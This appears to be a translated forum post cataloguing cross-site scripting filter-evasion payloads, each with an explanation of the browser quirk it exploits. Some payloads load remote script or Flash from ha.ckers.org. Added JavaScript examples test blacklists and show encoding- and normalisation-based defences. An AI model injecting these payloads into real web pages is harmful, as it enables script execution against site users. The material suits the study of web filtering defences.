1. Change the case of characters

<sCript>alert('d')</scRipT>

Tag and attribute names are case-insensitive in HTML, so a filter that looks for the lowercase string "<script>" never sees this one.
2. Add extra characters to evade regular-expression checks

<<script>alert('c')//<</script>

<SCRIPT a=">" SRC="t.js"></SCRIPT>

<SCRIPT =">" SRC="t.js"></SCRIPT>

<SCRIPT a=">" '' SRC="t.js"></SCRIPT>

<SCRIPT "a='>'" SRC="t.js"></SCRIPT>

<SCRIPT a=`>` SRC="t.js"></SCRIPT>

<SCRIPT a=">'>" SRC="t.js"></SCRIPT>

The extra leading "<" defeats filters that pair each "<" with the next ">" and compare what lies between them (they extract "<script", not "script"). The junk attribute a=">" defeats patterns such as <script[^>]*src= that stop at the first ">": the browser reads a quoted attribute value through to its closing quote, so the ">" inside it does not end the tag. The backtick-quoted form relies on an Internet Explorer quirk; the other browsers do not treat "`" as an attribute delimiter.
3. Use a different extension instead of .js

<script src="bad.jpg"></script>

The file name means nothing to the browser: whatever the response body contains is executed as script (unless the server sends X-Content-Type-Options: nosniff together with a non-script Content-Type), so a filter that only blocks src values ending in ".js" is trivially bypassed.
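As an added example, not part of the original post, the script below runs the payloads from items 1 to 3 against three blacklist idioms that real filters use (a literal case-sensitive "<script>" match, "balanced bracket" tag-name extraction, and a "<script ... src=*.js" pattern) and reports which variant slips past which idiom. It then applies HTML-entity encoding, the correct defence for untrusted text placed in an HTML body, and shows that no tag survives it. The blacklist functions, escapeHtml and evaluate are the example's own constructions, not code from the post.

```javascript
// Added example, not part of the original post: the payloads from items 1-3
// against three blacklist idioms real filters use, then against HTML-entity
// encoding. Blacklist and helper names are our own.

// Payloads copied from items 1-3.
const payloads = {
  mixedCase:     "<sCript>alert('d')</scRipT>",
  extraBrackets: "<<script>alert('c')//<</script>",
  junkAttribute: '<SCRIPT a=">" SRC="t.js"></SCRIPT>',
  fakeExtension: '<script src="bad.jpg"></script>',
};

// Each returns true when it would block the input.
const blacklists = {
  // literal, case-sensitive match on the opening tag
  literalScript: html => /<script>/.test(html),
  // "balanced bracket" extraction: text between each < and the next >,
  // first word, compared case-insensitively (<<script> yields "<script")
  pairedTagName: html => [...html.matchAll(/<([^>]*)>/g)]
    .map(m => m[1].split(/\s/)[0].toLowerCase())
    .includes('script'),
  // external .js loader; [^>]* stops at the > inside a=">" and .jpg is not .js
  scriptWithJsSrc: html => /<script[^>]*src="[^"]*\.js"/i.test(html),
};

// Correct defence for untrusted text in an HTML body context: encode the
// five characters that can open or close a tag or an attribute value.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return s.replace(/[&<>"']/g, c => map[c]);
}

// For each payload: which blacklists it slips past, and whether any tag
// can still form after escaping (it never can).
function evaluate() {
  const out = {};
  for (const [name, html] of Object.entries(payloads)) {
    out[name] = {
      bypasses: Object.keys(blacklists).filter(k => !blacklists[k](html)),
      tagSurvivesEscaping: /<\/?[a-z]/i.test(escapeHtml(html)),
    };
  }
  return out;
}

console.log(JSON.stringify(evaluate(), null, 2));
```

Run with node: the mixed-case and fake-extension payloads pass literalScript and scriptWithJsSrc, the extra-bracket payload passes pairedTagName and scriptWithJsSrc, and the junk-attribute payload passes scriptWithJsSrc even though its SRC really is a .js file (and literalScript, by case). No single blacklist stops all four, while escapeHtml stops every one of them because no "<" survives the encoding.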
4. Put the JavaScript in a CSS file

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

example (contents of xss.css):

body {
  background-image: url('javascript:alert("XSS");')
}

javascript: URLs referenced from a style sheet were executed by old Internet Explorer and other legacy browsers; current browsers treat them as a failed image load.
5. Insert other characters inside the script tag

<SCRIPT/SRC="t.js"></SCRIPT>

<SCRIPT/anyword SRC="t.js"></SCRIPT>

The HTML tokenizer accepts "/" as a separator between the tag name and its attributes, so a filter that requires a space after "<script" misses both forms.
6. Use a tab or a new line to evade

<img src="jav ascr ipt:alert('XSS3')">    -> tab

<img src="jav ascr ipt:alert('XSS3')">    -> new line

<IMG SRC="jav ascript:alert('XSS');">

The forum rendering has collapsed the whitespace to spaces; in the real payloads the gaps in the first line are tab characters and in the second line new-line characters, as the labels indicate. The browser's URL parser deletes tab, LF and CR anywhere in a URL before it looks at the scheme, so "jav<TAB>ascript:" is still a javascript: URL. A plain space inside the scheme is not removed, so a literal "jav ascript:" is inert.
7. Use "\" to evade

<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

<IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

In CSS a backslash before a non-hex character simply yields that character, and /* */ comments are removed by the tokenizer, so the browser sees "expression" and "@import 'javascript:" where a string-matching filter sees neither. In the last vector the "*//*" sits inside a string, so it does not open a comment for the browser, but it does for a filter that strips comments without tracking strings. expression() and javascript: URLs inside style sheets only executed in old Internet Explorer.
8. Use hex encoding to evade (the ";" ending each character reference may also be dropped)

Encoded: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">
source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

Encoded: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

(The forum has rendered the character references in the encoded versions, so they display identically to the source lines. Browsers decode numeric references such as &#x6A; or &#106 inside attribute values before parsing the URL, and they tolerate a missing trailing semicolon.)
9. Script in an HTML tag (event-handler attributes)

<body onload="alert('onload')">

Any of the following event-handler attributes can carry script. Many of them are Internet Explorer-only (onactivate, onbounce, oncellchange, onpropertychange and the like), while onload, onerror, onclick, onmouseover, onfocus and onsubmit work in every browser:
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

10. XSS code inside an SWF (Flash) file

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

AllowScriptAccess="always" lets ActionScript in the movie call JavaScript in the embedding page, so a filter that only inspects HTML never sees the payload.
11. Use CDATA to split the XSS code and let the browser reassemble it

<XML ID=I><X><C>
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X>
</xml>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

Both rely on Internet Explorer XML data islands: the string "javascript:" never appears contiguously in the page, but DATAFORMATAS=HTML re-inserts the joined text as markup.
12. Use HTML+TIME (Internet Explorer behaviors)

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert('XSS')</SCRIPT>">
</BODY></HTML>

The t:set element assigns innerHTML when the timeline starts, so the script element exists only inside an attribute value until the behavior inserts it; a filter that only examines element names never sees it.
13. Write a cookie via META

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

The META tag itself only sets (or overwrites) the cookie; the payload fires wherever the application later writes the cookie value back into a page without encoding it. Modern browsers ignore http-equiv="Set-Cookie".
14. javascript: in src, href and url()

<IFRAME SRC=javascript:alert('13')></IFRAME>

<img src="javascript:alert('XSS3')">

<IMG DYNSRC="javascript:alert('XSS20')">

<IMG LOWSRC="javascript:alert('XSS21')">

<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

<IFRAME SRC=javascript:alert('XSS27')></IFRAME>

<TABLE BACKGROUND="javascript:alert('XSS29')">

<DIV STYLE="background-image: url(javascript:alert('XSS30'))">

<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}</STYLE><A CLASS=XSS></A>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

IFRAME and FRAME SRC still navigate to javascript: URLs in current browsers; the image, LOWSRC/DYNSRC, table background, stylesheet HREF and CSS url() forms only worked in old Internet Explorer and other legacy browsers.
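The whitespace (item 6), backslash and comment (item 7), character-reference (item 8) and javascript:-in-URL (items 4 and 14) tricks all work because the browser normalises a value before it interprets it, while a naive filter compares the raw bytes. This added example, not from the original post, implements that normalisation in JavaScript for URL attribute values, inline CSS and META refresh content, and then checks the normalised form for javascript: and expression(). The sample inputs are constructed from the post's payloads, using real tab and new-line characters where the forum rendering shows spaces; decodeEntities, normalizeUrl, normalizeCss and the other function names are the example's own.

```javascript
// Added example, not part of the original post: normalise a value the way a
// browser does before it decides whether it is a javascript: URL or a CSS
// expression(), then check the normalised form. Function names are our own.

// Decode numeric and a few named character references. Browsers decode
// attribute values before the URL parser sees them and accept a reference
// without its trailing ";".
function decodeEntities(s) {
  const named = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'", tab: '\t', newline: '\n', colon: ':' };
  return s.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);?/gi, (m, body) => {
    if (body[0] === '#') {
      const cp = /^#x/i.test(body) ? parseInt(body.slice(2), 16) : parseInt(body.slice(1), 10);
      return cp > 0x10ffff ? '\uFFFD' : String.fromCodePoint(cp);
    }
    const key = body.toLowerCase();
    return Object.prototype.hasOwnProperty.call(named, key) ? named[key] : m;
  });
}

// URL pre-processing (WHATWG URL parser): strip leading/trailing C0 controls
// and spaces, delete tab/LF/CR anywhere; the scheme is case-insensitive.
// A plain space inside the scheme is NOT removed, so "jav ascript:" is inert.
function normalizeUrl(raw) {
  return decodeEntities(raw)
    .replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, '')
    .replace(/[\t\n\r]/g, '')
    .toLowerCase();
}

function isScriptUrl(raw) {
  return /^javascript:/.test(normalizeUrl(raw));
}

// CSS tokenisation: "\" + non-hex char is that char, "\6A" is a hex escape,
// /* */ comments vanish, but a comment cannot start inside a string.
function normalizeCss(css) {
  let out = '', quote = null;
  for (let i = 0; i < css.length; ) {
    const c = css[i];
    if (c === '\\') {
      const hex = /^[0-9a-f]{1,6}/i.exec(css.slice(i + 1));
      if (hex) {
        out += String.fromCodePoint(parseInt(hex[0], 16));
        i += 1 + hex[0].length;
        if (css[i] === ' ') i++;               // one optional space ends a hex escape
      } else {
        out += css[i + 1] ?? '';
        i += 2;
      }
      continue;
    }
    if (quote) {                               // inside a string: only look for its end
      if (c === quote) quote = null;
      out += c; i++; continue;
    }
    if (c === '"' || c === "'") { quote = c; out += c; i++; continue; }
    if (c === '/' && css[i + 1] === '*') {     // comment: drop through the next */
      const end = css.indexOf('*/', i + 2);
      i = end === -1 ? css.length : end + 2;
      continue;
    }
    out += c; i++;
  }
  return out.toLowerCase();
}

function cssHasScript(css) {
  const n = normalizeCss(css);
  return /expression\s*\(/.test(n) || /(?:url\(|@import)\s*['"]?\s*javascript:/.test(n);
}

// META refresh CONTENT is "<seconds>;url=<url>"; the "url=" prefix is optional.
function metaRefreshIsScript(content) {
  const m = /^[\s\d.]*[;,]\s*(?:url\s*=\s*)?(.*)$/i.exec(content);
  return m !== null && isScriptUrl(m[1]);
}

// Constructed inputs following the post's items 6, 7, 8 and 14 (the forum
// rendering collapsed the real tab and new-line characters to spaces).
const urlSamples = {
  tab:         "jav\tascr\tipt:alert('XSS3')",
  newline:     "jav\nascr\nipt:alert('XSS3')",
  tabEntity:   "jav&#x09;ascript:alert('XSS')",
  hexEntity:   "&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert('XSS31')",
  mixedCase:   "  JaVaScRiPt:alert('XSS')",
  spaceInside: "jav ascript:alert('XSS')",      // inert: a space is not stripped
  benign:      "http://ha.ckers.org/xss.js",
};
const cssSamples = {
  backslashImport: "@im\\port'\\ja\\vasc\\ript:alert(\"XSS32\")';",
  backslashExpr:   "xss:expre\\ssion(alert(\"XSS33\"))",
  commentExpr:     "xss:expr/*anyword*/ession(alert('sss'))",
  stringComment:   "no\\xss:noxss(\"*//*\"); xss:ex/*XSS*//*/*/pression(alert(\"XSS\"))",
  urlScheme:       "background-image: url(javascript:alert('XSS30'))",
  benign:          "width: 100px; background-image: url('/img/bg.png')",
};

function report() {
  const run = (samples, fn) => Object.fromEntries(Object.entries(samples).map(([k, v]) => [k, fn(v)]));
  return {
    urls: run(urlSamples, isScriptUrl),
    css:  run(cssSamples, cssHasScript),
    meta: metaRefreshIsScript("0;url=javascript:alert('abc');"),
  };
}

console.log(JSON.stringify(report(), null, 2));
```

Every obfuscated sample is flagged and both benign samples are not, including "jav ascript:" with a real space, which the URL parser does not repair. The design point is that the check runs on the same string the browser will act on; string-matching the raw attribute value, as the filters evaded in items 6 to 8 do, can never keep up with the browser's own decoding rules.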